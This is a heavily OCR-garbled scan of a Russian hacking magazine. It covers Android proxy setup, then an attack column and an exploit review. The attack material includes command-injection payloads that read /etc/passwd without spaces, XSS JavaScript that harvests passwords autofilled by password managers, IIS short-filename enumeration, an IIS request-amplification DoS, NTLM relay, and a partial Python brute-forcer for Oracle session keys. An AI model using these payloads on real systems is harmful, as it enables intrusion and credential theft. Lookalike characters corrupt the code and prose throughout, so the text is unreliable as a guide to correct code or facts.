понадобится зашифрованный ѴРМ-туннель. 

По умолчанию АпсІгоісІ не позволяет за- 
вернуть трафик на прокси, такой функции нет 
ни в настройках, ни в стоковых приложениях. 
Поэтому мы должны установить сторонний 
прокси-сервер, который будет заворачивать 
трафик туда, куда нам нужно. Подобных реше- 
ний для АпсІгоісІ существует масса, однако я 
хотел бы остановиться на РгохуОгоісІ, у которо- 
го есть множество приятных функций: 

• возможность работы как НТТР/НТТР5/ 
50СК54/50СК55-прокси; 

• поддержка МТІМ/МТІМѵ2-аутентификации; 



• возможность включить прокси только 
для выбранных приложений; 

• возможность привязать различные настрой- 
ки кразнымточкамдоступа и30-сетям. 

Также у приложения есть виджет, 
который позволяет включать/выключать 
прокси при необходимости. В своей работе 
РгохуОгоісІ полностью опирается на Ыпих- 
файрвол пеиіиег/ірІаЫез, поэтому без прав 
гооі не заведется ни под каким предлогом. 

У нас права гооі есть, так что никаких про- 
блем возникнуть не должно, если, конеч- 
но, производитель не выпилил поддержку 
пеиікег из ядра. 

Использовать РгохуОгоісІ довольно просто. 
После запуска достаточно указать адрес и порт 
прокси-сервера, а также его тип и нажать 
кнопку «Вкл/Выкл». После этого обмен данны- 
ми всех приложений будет происходить через 
прокси. Там же следует указать имя и пароль 
для аутентификации, настроить прокси для от- 
дельных приложений; для этого необходимо 
снять галочку с опции «Для всех приложений» 
и выбрать нужные в меню «Для выбранных 
приложений». Также можно создать новый 
профиль и привязать его к определенной сети, 
включив опцию «Автоподключение» и выбрав 
сеть в списке «Связанная сеть». 

Настроить ѴРМ в новых версиях АпсІгоісІ 
можно с помощью меню настроек, однако 
более старые версии, ниже 4.0, такой возмож- 
ности не имеют. Поэтому мы должны уста- 
новить ОрепѴРМ самостоятельно. Это можно 
сделать с помощью двух приложений: ОрепѴРМ 
ІпзІаІІег, которое следует просто запустить 
и нажать кнопку «ІпзІаІІ», и ОрепѴРМ Беиіпдз, 
позволяющее создать ѴРМ-туннель. Перед 
этим следует положить все необходимые 
настройки ѴРМ (конфиги и сертификаты) в ка- 
талог /зсісагсі/орепѵрп, запустить приложение 
и включить опцию ОрепѴРМ. 

Сегодня мы рассмотрели лишь малую часть 
из огромного арсенала профессиональных ин- 
струментов, доступных для АпсІгоісІ, но мы по- 
стараемся восполнить пробелы в следующих 
статьях . ^ 

шт 

• Без наличия прав гооі 
настроить прокси в Орега 
МоЬіІе можно через стра- 
ницу орега:сопПд, а в мо- 
бильной версии РігеТох — 
установив расширение 
РгохуМоЬ. 

• Приложение ѴѴіРі АОВ мож- 
но использовать совместно 
с системой автоматизации 
Тазкег для автоматического 
включения АОВ, например 
вовремя зарядки или 
при подключении к домаш- 
ней беспроводной сети. 

• Прошивка СуаподепМосІ 
и производные позволяют 
запускать АОВ в сетевом 
режиме из окна настроек 
(раздел «Для разработ- 
чиков»). 



ЗАГРУЗОЧНЫЕ СКРИПТЫ 



АпсІгоісІ наделен собственной системой инициализации, которая силь- 
но отличается от 5узѴ, зузіетсі и других іпіі-систем. Она использует 
всего один файл инициализации, в котором прописан весь процесс за- 
грузки системы, вплоть до запуска основных пользовательских прило- 
жений. Тем не менее ее можно модифицировать, добавив возможность 
запуска пользовательских скриптов инициализации, написанных 
на языке зИ. В СуаподепМосІ, АОКР и МШІ поддержка таких скриптов 
есть изначально, достаточно положить их в каталог /зузіет/еіс/іпіі.сі, 
и они будут запущены во время загрузки ОС. В стоковых прошивках 
поддержки іпіі.сі нет, но ее можно добавить, прошив модификацию ЕІ 
ІпіШ ( доо.дІ/УгИІі І через консоль восстановления. Коллекцию отличных 
скриптов на все случаи жизни можно найти на ХОА: доо.дІ/дд рдЬ. 
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взлом/ ЕА5УНАСК 



Алексей «бгеепОод» Тюрин, Оідііаі Зесигііу (іѵѵіиег.сот/апіуигіп) 




^чВСТАВИТЬ ПРОБЕЛ» 



ЗАДАЧА 



РЕШЕНИЕ 

Хмм... Какой странный заголовок получился... Но кратко и объ- 
емлюще иначе не вышло :). Так что давай я сперва разъясню на- 
чальную ситуацию. 

Давай представим, что мы ломаем систему и нам удалось найти 
уязвимость типа 05 СоттапсІ Іщесііоп. И какясно из названия, 
мы можем исполнять команды в ОС на атакуемой системе. Казалось 
бы, здесь — полный ѵѵіп для нас. Но не все так просто. На практике 
очень часто бывает, что реализовать атаку, даже если у тебя на ру- 
ках есть какие-то уязвимости, фактически не получается. 

Например, одно веб-приложение было испещрено Х55'ками, 
но из-за его специфики эти уязвимости не несли никакого профи- 
та. На них просто не получалось построить дельный вектор атаки. 

Так вот. С выполнением команд бывает иногда облом — 
мы не можем вставлять какие-то символы. И один из неприятных 
вариантов — невозможно вставить пробел, потому что они вы- 
резаются, например. То есть «ріпд 127.0.0.1» в итоге исполняется 
как «ріпд127.0.0.1». Что же делать? Вроде как и команды можно 
выполнять, а вроде и толка из этого не много. 

Недавно по наводке наткнулся на интересный пост, в кото- 
ром как раз решалась данная проблема, — аоо.аІ/УбЗІЬ . Решение 
же оказалось вполне простым. Как ни странно, все, что необходимо, 
заложено в возможностях виндового шелла. Если честно, то меня 
с первого взгляда это повергло в некое шоконедопонимание: 

ріп^%рго§гат1і1е5 : ~1Ѳ . 1%127 .0.0.1 

Но, погуглив, я увидел, что все несложно. Здесь мы после не- 
обходимой нам команды ріпд указываем переменную окружения, 
а далее вырезаем (зиЬзІгіпд) из нее интересующий нас символ — 



пробел. То есть командный интерпретатор получает эти данные 
от нас, потом берет переменную окружения %ргодгатЛ1е5%, 
в которой хранится строка «С:\Ргодгат Рііез», и, используя ма- 
гическую комбинацию «:~10,1», указывает вырезать 10-й символ. 
Оказалось, что эта комбинация — это зиЬзІгіпд в виндовой консо- 
ли. Кто б знал. Выяснилось, что там целый пучок возможностей — 
для интересующихся «зеі/І» в консоли. 

Ну и парочка аналогичных примеров, но только для *піх'ов, 
а точнее — для ЬазЬ'а: 

са1;${ІЕ550РЕМ:11:1}/е1;с/ра55ысІ 

са1:$ІР5/е1:с/ра55ысІ 

Здесь $1Р5 — Іпіегпаі РіеИ Зерагаіог, переменная, определяю- 
щая разделитель. По умолчанию равна пробелу (не во всех случаях 
будет решать нашу задачу). 



с :\и5ег5\5ѣ>есЬо ?ЙргодгалтРі 
С :\Ргодгат Рі 1 еь 

С : \ІІ5ег5\5ѣ>рі пд?йргодгаптР^і 1 сб О. О* 1 

Обмен пакетами с 127. О* О Л по с 32 байтами данных ; 

Ответ от 127*0.0,1: число байт=32 ареижімс ТТІ=123 

Статистика Ріпд ііля 127,0,0.1; 

Пакетов: отправлено = 1, получено = 1, потеряно = О 
(0?^ потерь) 

приблизительное время приема-передачи е мс: 

Минимальное = Омсек^ Максимальное = О м:сек, Среднее * О мсек 
Сопігоі-С 



Вставляем пробел из переменной окружения 
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Хакерские секреты простых вещей 



$1Е550РЕМ отвечает за настройку работы команды Іезз. 

По умолчанию будет «I /изг/Ып/Іеззріре %з». За подробностями 
и другими примерами для ВазЬ'а — доо.дІ/2іЬС6 . 

Как, я думаю, понятно, аналогичным образом вырвать можно 
и какой-то другой символ. Но есть пара моментов. Во-первых, 



должна быть известна позиция нашего символа. А во-вторых, 
данный символ должен быть в переменной окружения. Поэтому 
следует помнить, что данные способы привязаны к настройкам 
и версии ОС. Например, в немецкой версии %ргодгатП1ез имеет 
значение «СЛРгодгатте». 



ЗАПОЛУЧИТЬ ПАРОЛИ 
С ПОМОЩЬЮ ^АVА5СтРТ 



ЗАДАЧА 



РЕШЕНИЕ 

Когда есть какая-то уязвимость, хочется из нее выжать по мак- 
симуму. Поэтому на протяжении нескольких номеров я расписы- 
ваю различные векторы атак, связанные с Х55. Все -таки у Х55 
большой потенциал. Вот и сегодня мы увидим один из вариан- 
тов. 

В большинстве случаев Х55 приносит нам идентификатор 
сессии из кукисов, с помощью которого мы можем зайти на сайт 
под пользователем. Но так ли уж они интересны? Все-таки, 
наверное, приятнее было бы получить логин и пароль пользо- 
вателя. Чтобы потом в любой момент войти под жертвой на сайт 
и минимально зависеть от валидности кукиса. 

Сказано — сделано. На самом деле в теории все просто. Есть 
«шумный» путь, когда мы через Х55 создаем фишинговое окош- 
ко ввода логина и пароля: если пользователь поверит нам — мы 
получим необходимые данные. Но это неинтересно. Интересно — 
автоматически и «тихо». Хотя данный вариант тоже не самый 
стабильный и много от чего зависит, но он очень даже жизнеспо- 
собен. Автоматичность его возможна в том случае, если жертва 
использует менеджер паролей (или как они по-русски называ- 
ются). Встроенный в браузер или сторонний — не так важно, 
главное, чтобы тот автоматически вставлял данные в ячейки. 

Общий алгоритм, я думаю, тебе уже вполне понятен. Мы с по- 
мощью Х55 подгружаем наш ^аѵа5сгір^, который создаст такую 
ситуацию, чтобы менеджер паролей вставил интересующий нас 
пароль от сайта. И как только он его вставит, мы его сграбим 
и перешлем в желаемое место. 

Какова же должна быть данная ситуация? Это зависит от бра- 
узера или менеджера паролей. На эту тему недавно появилось 
неплохое исследование — доо.д1/АШЕ5. которое я и взял за ос- 
нову. Бен Тоус (Веп Тоеѵѵз) рассмотрел браузеры ІЕ, ЕР, СЬготе 
и тулзу ЕазіРазз. И из всех из них можно было украсть пароли 
(при настройках по умолчанию). 

Но для начала немножко важной теории. ЕР, СЬготе, 

ЕазіРазз для того, чтобы определить, какие аутентифика- 
ционные данные ввести, смотрят полный домен сайта. То 
есть «зиЬ.ехатрІе.огд» и «таіі.ехатріе.огд» для них разные 
сайты. По сути — стандарты 50Р действуют. Но более глубо- 
кого, по «пути до страницы» (раЧп) разделения нет. То есть нет 
разницы между «ехатрІе.огд/Іодіп.рЬр» и «ехатріе.огд/пеѵѵз. 
рЬр». На обоих, если парольный менеджер увидит необходимые 
поля, будут введены одинаковые аутентификационные данные. 

ІЕ в данном случае отличается в лучшую сторону, так как он 
учитывает путь. Так вот, этой «беспутейной» фичей мы и можем 
воспользоваться. Небольшой пример: 

//1 

-Рипсіііоп а1:1:аскП { 

ех изегпате = сІоситеп1;.§е1:Е1етеп1;ВуІсІ( 'изегпате' ) 

ѵаіие: 

ех_раз5ыогс1 = сІоситеп1;.§е1:Е1етеп1;ВуІсІ( ' раззыогсі ' ) .<-■ 

ѵаіие; 

(ех_изегпате != ' ' | ех_раз5ыогсІ != '') { 



а1ег1;( "и5егпате=" + ех_и5егпате + "&раз5ыогсІ = " + ^ 
ех раззыогсП ; 

} 

} 

иг 

сІоситеп1:.ыгі1:е("\ 

<-Рогт те1;ІіосІ= ' ро5І: ' ас1:іоп= ' іпсіех. рбр ' > 

изегпате : <іпри1; 1;уре= Чехі; ' пате= ' изегпате ' 

ісІ= ' изегпате ' ѵа1ие='' аи1:осопір1е1:е= ' оп ' ><Ьг> <-■ 
раззыогсі : <іпри1: 1іуре= ' раззыогсі ' пате= ' раззыогсі ' <-■ 
ісі= ' раззыогсі ' ѵа1ие='' аи1:осопір1е1:е= ' оп ' ><Ьг> 

<іпри1: 1;уре^ зиЬтіІ; ' пате='1о§іп' ѵа1ие='Іо§ Іп'> ^ 
</-Рогт> ^ 

От 

//3 

іпііег = ыіпсіоы. зе1:Іп1:егѵа1("а1:1:аскП " . 1ѲѲѴ. 

Здесь такая последовательность. Сначала в пункте 2 мы 
добавляем на Х55'нутую страничку дополнительный НТМЕ, 
а именно формочку. Как только она появится, парольный менед- 
жер тут же вставит необходимые данные. Потому в пункте 3 мы 
запускаем функцию 1 через каждые 0,1 с. Данная функция смо- 
трит, введены ли аутентификационные данные, и сохраняет их. 
Можешь попробовать и сам — доо.дІ/ОдгЬ? . В случае же с ІЕ, ког- 
да есть привязка к пути, нам потребуется действовать немного 
более комплексно, хотя суть — перехват после ввода данных — 
остается. Все, что нам необходимо, — открыть первую страницу 
(настоящую) в фрейме, созданном 35 через Х55. И с учетом того, 
что домен во фрейме тот же, где исполняется наш 35, мы имеем 
возможность вставить в этом фрейме необходимый нам код, 
который будет мониторить ввод данных парольным менеджером. 

Вот, все, в общем, просто. Хотя, конечно, здесь есть привязка 
к браузерам и к пользованию менеджером жертвой, но профит — 
аутентификационные данные — уж очень приятен. 

И под конец хотелось бы отметить, что это все можно про- 
вести незаметно для пользователя. В общем случае главное — 
загнать его на наш сайт, а там уже в скрытом фрейме откроется 
Х55'ка на атакуемом нами сайте и вдернутся необходимые 
пароли... 



После сохранения пароля браузер Нам на радость браузер ввел пароль даже 

вводит его сам на другой странице 




С □ Ьоот«ілвоЛар 5 і 5 .со<ті рл)>«/іп<і«х.рііо 

Ьо2 1п(о Зесгеі АррПсаІІоп 

ш«пите:|имгІ 

ІЮВІПІ 



соовг рк>' «Ій гсйесііоіц 
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НАЙТИ ФАЙЛЫ НА ВЕБ-СЕРВЕРЕ 115 



ЗАДАЧА 



РЕШЕНИЕ 

В прошлом номере я писал про метод, который в отдельных 
случаях позволяет обойти кастомные страницы ошибок 
в N5 и, используя это, организовать перебор файлов на веб- 
сервере. Данная задача в каком-то смысле является ее 
продолжением, потому что и автор техники тот же, и цель 
задачи аналогична — найти файлы. Но сразу стоит отметить, 
что основополагающая идея здесь гораздо более глубокая. 

Не стану вводить тебя в заблуждение и скажу сразу — искать 
файлы мы будем с помощью коротких имен файлов в ѴѴіпсІоѵѵз. 
Чтобы разобраться, что такое короткие имена, нам необходимо 
обратиться к истории и вики. 

Итак, «8.3 ЛІепаппе» (5РМ — зЬогІ: ЛІепаппе) — нотация 
формата записи имени файла в некоторых файловых системах, 
подразумевающая использование восьми символов для имени 
файла и трех символов для расширения. Традиционно 
применялась в разработанных компанией Місгозоі^і; для М5-005 
файловых системах РАТ16. То есть весь олдскул основан на этих 
правилах: «соппппапсі.сопп», «сппсі.ехе», «саіс.ехе» :). 

Но с появлением Винды с ее ѴРАТ стало возможно 
использовать длинные имена (ІРМ, Іопд ЛІепаппе), да еще 
и в различных регистрах. И для хорошей совместимости 
со старым досовским ПО, ОС для всех имен, не подпадающих под 
правила 8.3, хранит также и их короткие версии имен. Примерно 
по следующему алгоритму имена конвертируются из ІРМ в 5РМ: 

1. Если ІРМ в верхнем регистре и подходитпод правило 8.3, то ни- 
каких преобразований не происходит. А если верить вики, то ІРМ 
вообще не используется, толькоЗРМ. 

2. Если ІРМ включает символы в нижнем регистре и не выходит 
за рамки 8.3, то просто происходит конвертация в верхний ре- 
гистр. Пример: ТехіРіІе.ТхІ — ТЕХТРІІЕ.ТХТ. 

3. Если ІРМ длиннее 8.3 и/или содержит запрещенные символы 
(например, пробелы), то имя обрезается, а «плохие» символы 
вырезаются (хотя некоторые меняются на «_»). Обрезание про- 
исходит до шестого символа ІРМ. Далее добавляется тильда 
(~), цифра-идентификатор, а потомточка и первыетри символа 
расширения.Пример: ѵег(пробел) +1.2.1:ех1; — ѴЕР_1 2~1 .ТЕХ. 

Цифра-идентификатор требуется для того, чтобы указывать 
на конкретные файлы, если начальная часть ЕРМ имени у них 
одинаковая. Примеры: ТехіРіІеІ .Міпе.іхі; — ТЕХТРІ-1 .ТХТ, а Техі- 
РіІеЗ.АААА.ІхІ — ТЕХТРІ-2.ТХТ. Наверное, здесь стоит отметить, 
что Місговоі^і: сильны в Ьаскѵѵагб-соппраІіЬіІіІу, а потому даже 
в последних версиях ОС (ѴѴіп2008, ѴѴіп7) есть и поддержка 
5РМ. Для того чтобы посмотреть на примере, можем ввести 
в консоли «сііг/х» («СІІГ/-П»), и тогда мы увидим 5РМ и ЕРМ (см. 
скриншот 1). Думаю, все вполне легко и понятно. 

Теперь перейдем к самой атаке. Соруш Далили (ЗогоизЬ 
□аіііі) подразресерчил эту тему в контексте работы N5 
( доо.дІ/ѵѵРСМс ). На самом деле он пытался заюзать 
спецсимволы ѵѵіІбсЬаг'ы * и ? при обращении к файлам, 
но наткнулся на применение и тильды. В итоге он выяснил, 
что есть возможность определить начальные шесть символов 
имен файлов и папок (то есть 5РМ) для всех ЕРМ файлов. 

А с учетом того, что при использовании .МЕТ расширение 
по умолчанию азрх (то есть ЕРМ), мы имеем возможность 
выискать все скрипты. Соруш Далили отметил, что, 
используя некие манипуляции с именами и получая ответы 
от сервера, мы имеем возможность вычислить существующие 
и несуществующие файлы. Взгляни на скриншот 2, и все 
будет понятно. Но для точности разберем один из вариантов. 

Итак. В 115 лежит файл ѵаіісііопд.ехіх, который в формате 
8.3 имеет вид ѴАЕІВЕ-1 .ЕХТ. Если мы отправляем на сервер 
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Скрин 2. 115 отвечает по-разному для существующих 
и несуществующих имен файлов 
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Скрин 3. Последовательный подбор имени файла/папки 
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запрос по пути «/ѵаІісІ*~1*/.а5рх» и файл существует, 
то N5 нам ответит «НТТР 404 — Рііе поі; І^оипсІ». Если 
не существует — «НТТР 400 — ВасІ Рериезі:». Воттакая вот 
странность поведения N5. Если же разобрать запрос, то 
«/.азрх» используется лишь для того, чтобы «подключить» 
.МЕТ для обработки ошибок (более подробно получается), 
а звездочка трактуется как один или более символов. Кроме 
того, следует отметить, что мы также можем применять 
символ ?, который трактуется как один любой символ (в игі- 
епсобіпд представлении он будет выглядеть как %ЗЕ). 

Теперь, взглянув на третий скрин, ты без проблем 
поймешь, как пошагово происходит подбор первых букв 
имени и расширения. Кстати, посимвольный перебор не надо 
проводить руками. Соруш реализовал на Заѵа тулзу [ доо.ді/ 
дСААО ), которая по заданному ІІРЕ перебирает имена файлов. 
Есть многопоточность и возможность использовать прокси. 
Видеопример — доо.дІ/дЬеѵО . Попробовать самому тут — зсІІ.ппе . 



Что дальше с этим делать? Все просто, подключаем голову, 
гугл и дирбастер для получения полных имен скриптов 
и папок. 

В качестве ограничений стоит отметить, что игігеѵѵгіиіпд 
(то есть когда мы не можем обратиться к конкретным файлам/ 
папкам ОС) защитит от этого. Также автор сообщил, что 
способ не работал против .МЕТ І^гаппеѵѵогк 4, но в комментах 
его блога кто-то утверждал обратное. 

Почему я так подробно описываю данную атаку и саму 
фишку коротких имен? Все потому, что в этой «атаке» 
используется не какая-то мисконфигурация ОС или бага 115 
или А5Р.МЕТ, а легальная возможность или даже фишка ОС. 

А потому аналогичные трики в том или ином виде мы можем 
найти и в других приложениях/языках под винду — и такое, 
в общем-то, было, только примера конкретного я сейчас 
приводить не буду :). Это значит, есть еще много мест, где можно 
покопать. 



^<ЗАГРУЗИТЬ> ВЕБ-СЕРВЕР 115 



ЗАДАЧА 



РЕШЕНИЕ 

На самом деле эта задача является продолжением предыдущей. 

Но из-за ее ітрасСа я ее вынес в отдельный пункт. К тому же Еазу 
Наск я использую как личную базу знаний, и так будет проще найти 
интересующее потом :). 




«Загружаем» 115 запросами в различных регистрах 



Соруш отметил забавное поведение .МЕТ'а. Если послать за- 
прос «~1» в какой-то несуществующей директории веб-сервера, 
то .МЕТ попытается найти этот файл рекурсивно по всем корневым 
директориям на веб-сервере. То есть один запрос порождает мно- 
жественные запросы к файловой системе. Не слишком критично, 
но все же интересно. 

Кроме того, автор указывает, что эффект может быть усилен, 
если, во-первых, запрашивать различные несуществующие фай- 
лы, так как повторный запрос к несуществующему файлу не ини- 
циализирует полный перебор по файловой системе; во-вторых, ис- 
пользовать множество вложенных неправильных имен директорий 
с «~1». В качестве примера могу привести такой варинат: 
Ьир://ехатр1е.сот/1'аке~1/~1/~1/~1/~1/~1/~1/~1/~1/~1.а5рх. 

В-третьих, использовать различные регистры в именах файлов 
и папок — это заставит произвести поиск дважды: и приведя все 
к верхнему регистру, и приведя к нижнему (например, 
«Ьир://ехатр1е.сот/аА~1.А5Рх»). 

Как видишь, и просто, и потенциально деструктивно. Три 
миллиона обращений — это очень прилично для одного запроса. 
Хотелось бы отметить, что «фичи», которые лежат в основе этой за- 
дачи и предыдущей, будут оставаться фичами, так как Микрософт 
не считает их багами и патчить не намерена. Ктому же эти трюки 
работают со всеми версиями .МЕТ ^гатеѵѵогк. 



ОБОЙТИ МТЬМ-АУТЕНТИФИКАЦИЮ 



ЗАДАЧА 



РЕШЕНИЕ 

Данный выпуск получился каким-то дико виндовым. И потому я 
добавлю такую «боянистую» задачку. Но с учетом «добрых вестей 
с фронта», страшности тулзы и показательных рисунков, я думаю, 
что будет интересно. Во-первых, теория. Кратко, для напомина- 
ния. МТЕМ — это виндовый протокол, который используется для 
аутентификации. В упрощенном виде клиент и сервер для МТЕМ- 
аутентификации проходят по следующим шагам: 

1. Клиентподключается ксерверу, сообщаетсвои настройки. 

2. Сервер отвечает тем же рандомным 16-байтным числом — 
сЬаІІепде'ем. 

3. Клиент шифрует сЬаІІепде'ем свой пароль (точнее, его хеш) 
и отправляетего на сервер. 



4. Серверрасшифровываетпарольи решает, 
аутентифицироватьли его. 

С приходом МТЕМѵ2 и широким распространением новых ОС, где 
ЕМ и МТЕМѵІ не используются, пробрутить пароль становится не самой 
простой задачей. Но, как ты, наверное, знаешь и/или видишь, МТЕМ 
подвержен другой, возможно даже более глубокой атаке, а именно — 
МТЕМ геіау. Если что, 5МВ геіау — это частный случай МТЕМ геіау. 

Суть же атаки в том, что мы, заставив жертву к нам подключиться 
и начать аутентифицироваться по МТЕМ, можем спокойно перекинуть 
«эти попытки» на сервер, и в итоге мы будем аутентифицированы под 
нашей жертвой на сервере и сможем там выполнять любые действия. 
И еще раз уточню — МТЕМѵ2 здесь не спасет. 
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Протоколов, 

поддерживающих 

МТІМ- 

аутентификацию, 
достаточно много. 
Релей с любого 
на любой! 
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У НЕКОТОРЫХ ПРО- 
ТОКОЛОВ ЕСТЬ ДО- 
ПОЛНИТЕЛЬНЫЕ 
МЕРЫ ЗАЩИТЫ. 
ТАК, ДЛЯ 5МВ — 
ЭТО ПОДПИСЬ 
ПАКЕТОВ 



Ѵ/АВНІНб 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



ІШЛ 

Все описанные 
программы со всей 
рубрики ищи 
на диске. 



Как я уже сказал, 5МВ геіау — это тот же МТІМ геіау. Фишка 
в том, что Місгозоі'і позволяет включить МТІМ-аутентификацию для 
большинства протоколов! То есть и РОРЗ, и НТТР, и РТР, и Теіпеі 
(полный список на рисунке). И что еще важнее, мы, по сути, можем 
прозрачно релеить с протокола на протокол! То есть кроме классиче- 
ского НТТР25МВ и 5МВ25МВ существует еще масса вариантов. 

Конечно, есть свои тонкости. Во-первых, у некоторых про- 
токолов есть дополнительные меры защиты. Так, для 5МВ — это 
подпись пакетов. Но это скорее исключение из правил. Во-вторых, 
не все протоколы по умолчанию разрешают подключаться с ис- 
пользованием МТІМ. И в-третьих, для атаки нам надо заставить 
пользователя подключиться к нам. Так вот, протоколов, которые 
автоматически пытаются аутентифицироваться по МТІМ, тоже не 
так много (5МВ, НТТР). 

Но это все в теории. На практике, из того, что я видел во многих 
компаниях, мы имеем следующее. Для начала: почти во всех 
компаниях используется МТІМ для аутентификации — КегЬегоз 
не в моде :). Почти ни в одной не используются методы защиты на 
уровне протоколов (та же подпись 5МВ-пакетов). А самое глав- 
ное — почти все компании стремятся к тому, чтобы внедрить еди- 
ную аутентификацию. То есть подключить МТІМ-аутентификацию 
везде, где только можно: корпоративные сайты (НТТР/НТТР5), 
прокси-серверы (НТТР/НТТР5), почта (ІМАР, РОРЗ, 5МТР), базы 
данных (М5501) и так далее. 

Конечно, это хорошо — один пароль на все системы и удобство 
администрирования (вроде бы), но это очень-очень не секьюрно. 
Да, если говорить о стандартном 5МВ геіау, то нам надо атаковать/ 
заманивать админа и/или кого-то еще привилегированного. Но 
когда мы имеем возможность работать с другими протоколами, 
мы в каком-то смысле можем атаковать всех пользователей. 



Здесь просто все становится чуть менее универсально, так как 
многое зависит от корпоративной сети. Но в любом случае единая 
аутентификация на основе МТІМ чаще всего приводит к тому, 
что мы можем достаточно быстро захватить контроль над всей 
сетью. Например, если есть какой-то критичный сайт с МТІМ- 
аутентификацией, то мы можем заставить какого-нибудь при- 
вилегированного пользователя законнектиться к нам и релеить 
данные на сайт. Такая операция в конечном счете поволит нам 
быть полностью аутентифицированными на сайте. Или, например, 
если мы срелеим простого пользователя, то можем посканить 
«под ним» шары какого-то еще хоста и в случае успеха скачать 
или записать на них какие-то файлы. 

Ну и обещанная тулза. В Меіазріоіі недавно был добавлен 
модуль Ьир_пІІтгеІау, который позволяет с НТТР релеить на 
НТТР или 5МВ. Это вроде бы немного (и почти то же, что и было), 
но здесь есть ряд отличий. Во-первых, добавлена поддержка 
МТІМѵ2 (то есть отключенный МТІМѵІ нам теперь не помеха). Во- 
вторых, появилась возможность создавать последовательности 
действий. То есть можно заставить модуль после аутентифика- 
ции на атакуемом сайте зайти на определенную страницу сайта, 
вынуть апІіС5РР-токен из нее и использовать его для задания 
следующего запроса. В-третьих, на основании его можно строить 
аналогичные модули, но для других протоколов. В общем, простор 
для творчества. 

Более полные примеры и видео можно увидеть здесь — 
доо.д1/4дР11 . Очень рекомендую, как говорится — «лучше один раз 
увидеть...» 

Вот и всё на сегодня. Надеюсь, что было интересно :). Исполь- 
зуй полученные знания с умом. Успешных ресерчев и познаний 
нового! 
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Не пропускай занятия! 




ті?Й8ЯГ 






Или попроси друга поставить ІР-камеру в первый ряд... 




Реклама 



ѵѵѵѵѵѵ.ігепсіпеігц 
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Павел Александрович (іѵіпзісІе.ЫодБроСсот) 




ІѵУАкмтбІ 

Вся информация предоставлена исключительно 
в ознакомительных целях. Ни редакция, ни автор не несут 
ответственности за любой возможный вред, причиненный 
материалами данной статьи. 



Если отладка — это процесс 
удаления ошибок, то программи- 
рованиедолжно быть процессом 
их внесения. 



Э. Деикстра 



ЭКСПЛОИТОВ 



АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 



р|~| Обход аутентификации в Огасіе ОаІаЬазе 



СѴ55Ѵ2 6.4МЕОіиМ 



(АѴ:М/АС:1/Аи:М/С:Р/І:Р/А:М) 

Протокол аутентификации Огасіе позволяетудаленному ата- 
кующему получить за шифре ванный идентификатор сессии 
и соль произвольного пользователя. На основании этих да иных 
становится возможным провести атаку типа брутфорс. Впервые 
уязвимостьбыла продемонстрирована общественности ис- 
следователем Эстебаном Мартинесом Файо (ЕвІіеЬап Магііпег 
Рауо) на мероприятии Екорагіу зесигііу сопі'егепсе, проходившем 
в Буэнос-Айресе. Интересен тотфакт, что исследовательотправил 
отчет Огасіе об этой уязвимости в далеком мае 201 0 года. Огасіе 
пофиксила его в новой версии протокола в середине 2011-го, одна- 
ко новая версия протокола аутентификации не используется в те- 
кущей версии базы данных по умолчанию. И вот только в середине 
октября 2012-го выходитпатч, который реально делаеттекущие 
версии базы данных невосприимчивыми к этой уязвимости. 



ЕХРЮІТ 



Сама по себе атака очень проста. Атакующему необходимо знать 
лишь имя пользователя и имя базы данных на сервере. Далее 



он запускает процесс аутентификации. Сервер присылает ему 
зашифрованный идентификатор сессии и соль. Ключом в данном 
случае выступает не что иное, как пароль + соль. Кроме этого, 
былозамечено, что в идентификаторе сессии последние восемь 
цифр всегда 88888888 — прямо магия чисел какая-то, позволяю- 
щая атакующему с высокой долей вероятности определить, что 
ключ подобран правильно. Интересно еще, что идентификатор 
сессии не отсылается на сервер и действия атакующего не попа - 




4. (.ОСІЫ ^ 5У5№П> 




2. Сервер генерирует идентификатор сессии в»ѵѵі 
= Х50000С. .88808888 




3. Промсхрдит шифрование идентификатора сессии: 
ЕгксіуірегІ Зеазіоп М = Е(аеа5іоп_і(і, 8НАі(и5ег_рт+^(}) 



4. ЕгісгуріесІ Зеагіоп ІіІ; ааіі- 




ПроцессаутентификациивбазеданныхОгасІе 
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Обзор эксплойтов 



дают в лог сервера, так что провести атаку можно полностью не- 
заметно. Эксплойт для подбора пароля пользователя я помещаю 
далее: 



2 



Выполнение произвольного кода в Іпѵівіоп 
Роѵѵег ВоагсІ 



СѴ55Ѵ2 



10.0 НІ6Н 



ітрогі: базІіІіЬ 

-Ргот Сгурііо. Сірбег ішрогі: АЕ5 



сіе-р сІесгур1:(5е55Іоп^ 5а11;^ разБыогсІ): 

ра55_Ііа5Іі = Ііа5Іі1іЬ.5Ііа1(ра55ыогсІ + заіі;) 

# Дополняем длину ключа шифрования до 24 байт 
кеѵ = ра5 5_Ііа5Іі . сІі^езІіП + ' \хѲѲ\хѲѲ\хѲѲ\хѲѲ ' 

сіесгѵрііог = АЕ5 . пеы(кеѵ. АЕ5.МОРЕ СВО 

ріаіп = сІесгур1;ог.сІесгур1;(5е55Іоп) 

геііигп ріаіп 



# Зашифрованный идентификатор сессии 48 байт 
5е55Іоп_Ііех = 'ЕА2043СВ8В46Е3864311С68ВОС161Р8^ 
СА17Ѳ363С1Е6Р57РЗЕВС6435Р541А8239В6РВА16ЕААВ5^ 
422553А7598143Е78767 ' 



# Соль 10 байт 

5а11:_Ііех = ' А71 93Е546377ЕС56639Е ' 



(АѴ:М/АС:1/Аи:М/С:С/І:С/А:С ) 

Широко известный в узких кругах исследователь безопасности 
Эджидио Романо (Едісііо Ротапоака ЕдіХ) обнаружил уязвимость 
в форумном движке Іпѵізіоп Роѵѵег ВоагсІ, которая позволяет вы- 
полнить произвольный РНР-кодна целевой системе. История 
успеха уязвимости: 

21.10.2012 — обнаружениеуязвимости; 

23.10.2012 — оповещение вендора; 

25.10.2012 — выход патча: доо.д1/хоа1:р; 

25.10.2012 — номер СѴЕзапрошен; 
29.10.2012-назначенСѴЕ-2012-5692; 

31.10.2012 — публикация в открытых источниках. 



ЕХРЮІТ 



Уязвимый код находится в методе ІР5Соокіе::де1;() и определен 
в/асІтіп/зоигсеб/Ьазе/соге.рЬр (строка 4015 и далее): 



# Список с подбираемыми паролями 

ра55ыогсІ5 = [Чезі:'. 'разБыогсІ'. 'огасіе'. 'сіешо'] 



-Рог разБыогсІ іп ра55ыогсІ5: 



# Дешифруем идентификатор сессии 

зезБІоп ісІ = сІесгур1:(5е55Іоп_Ііех.сІесосІе( ' Ріех' ) . <-■ 

